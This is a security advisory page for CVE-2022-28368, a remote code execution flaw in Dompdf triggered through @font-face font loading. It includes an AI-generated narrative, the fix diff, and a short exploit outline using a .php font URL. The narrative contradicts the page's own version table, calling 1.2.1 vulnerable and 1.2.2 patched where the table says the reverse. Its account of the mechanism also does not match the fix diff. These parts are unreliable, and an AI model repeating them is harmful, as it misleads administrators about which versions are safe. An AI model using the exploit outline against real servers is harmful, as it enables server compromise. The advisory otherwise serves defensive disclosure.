CVE-2022-28368
Description
Dompdf 1.2.1 allows remote code execution via a .php file in the src:url field of an @font-face Cascading Style Sheets (CSS) statement (within an HTML input file).
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Dompdf 1.2.1 allows RCE via a .php file in the src:url field of an @font-face CSS statement within an HTML input.
Vulnerability
Dompdf version 1.2.1 contains a remote code execution vulnerability in the handling of @font-face CSS rules. When processing an HTML document that includes a @font-face declaration, the parser passes the src:url() value directly to a font loading routine without adequate validation. An attacker can supply a url() that points to a .php file on the same server. Because dompdf uses fopen() with wrappers enabled, the PHP file is executed by the PHP engine before the result is loaded as a font. The vulnerability is present in dompdf versions prior to the fix committed in pull request #2808 [1][2].
Exploitation
The attacker must be able to upload or serve an HTML file that is processed by a vulnerable dompdf installation (version 1.2.1). No authentication is required if the application accepts user-supplied HTML content for PDF generation. The exploit involves crafting an HTML document with a @font-face block where the src:url field references a .php file (e.g., src: url("/path/to/exploit.php");). When dompdf parses this CSS, it attempts to fetch the font via PHP's file functions; if the referenced file is a PHP script, it is executed by the server's PHP interpreter, and the output (which may be arbitrary) is embedded into the generated PDF. The attacker must control a .php file on the same filesystem as the target application, or have access to a file upload feature that places a .php file reachable via the web root [1][2].
Impact
Successful exploitation results in remote code execution at the privilege level of the web server process. The attacker can execute arbitrary PHP code, which may lead to full compromise of the application and the underlying server, including data exfiltration, file manipulation, or lateral movement within the network. The vulnerability has been assigned a CVSS v3.1 score of 9.8 (Critical) due to low attack complexity, network attack vector, and no required privileges or user interaction [2].
Mitigation
The dompdf project addressed the vulnerability in pull request #2808, which ensures that the file extension of the font source matches the expected font type (ttf, otf, woff, etc.) before loading. The fix was merged, and a patched version (1.2.2) was released on 2022-04-15 via Packagist [3]. Users must upgrade to dompdf 1.2.2 or later. As a temporary workaround, administrators can disable PHP execution in directories where attacker-controlled files might be placed or restrict the open_basedir PHP directive to prevent access to scripts outside the intended font directory. The vulnerability is not currently listed in CISA's Known Exploited Vulnerabilities catalog [4].
AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
dompdf/dompdfPackagist | < 1.2.1 | 1.2.1 |
Affected products
2- Dompdf/Dompdfdescription
Patches
14c70e1025bcdMatch installed font filename extension to type
1 file changed · +7 −1
src/FontMetrics.php+7 −1 modified@@ -206,7 +206,6 @@ public function registerFont($style, $remoteFile, $context = null) } $cacheEntry = $localFile; - $localFile .= ".".strtolower(pathinfo(parse_url($remoteFile, PHP_URL_PATH), PATHINFO_EXTENSION)); $entry[$styleString] = $cacheEntry; @@ -258,6 +257,13 @@ public function registerFont($style, $remoteFile, $context = null) return false; } + switch ($font->getFontType()) { + case "TrueType": + default: + $localFile .= ".ttf"; + break; + } + $font->parse(); $font->saveAdobeFontMetrics("$cacheEntry.ufm"); $font->close();
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
10- github.com/advisories/GHSA-x752-qjv4-c4hcghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2022-28368ghsaADVISORY
- packetstormsecurity.com/files/171738/Dompdf-1.2.1-Remote-Code-Execution.htmlghsaWEB
- github.com/FriendsOfPHP/security-advisories/blob/master/dompdf/dompdf/CVE-2022-28368.yamlghsaWEB
- github.com/dompdf/dompdf/commit/4c70e1025bcd9b7694b95dd552499bd83cd6141dghsaWEB
- github.com/dompdf/dompdf/issues/2598ghsaWEB
- github.com/dompdf/dompdf/pull/2808ghsaWEB
- packagist.org/packages/dompdf/dompdfghsaWEB
- snyk.io/blog/security-alert-php-pdf-library-dompdf-rceghsaWEB
- snyk.io/blog/security-alert-php-pdf-library-dompdf-rce/mitre
News mentions
0No linked articles in our index yet.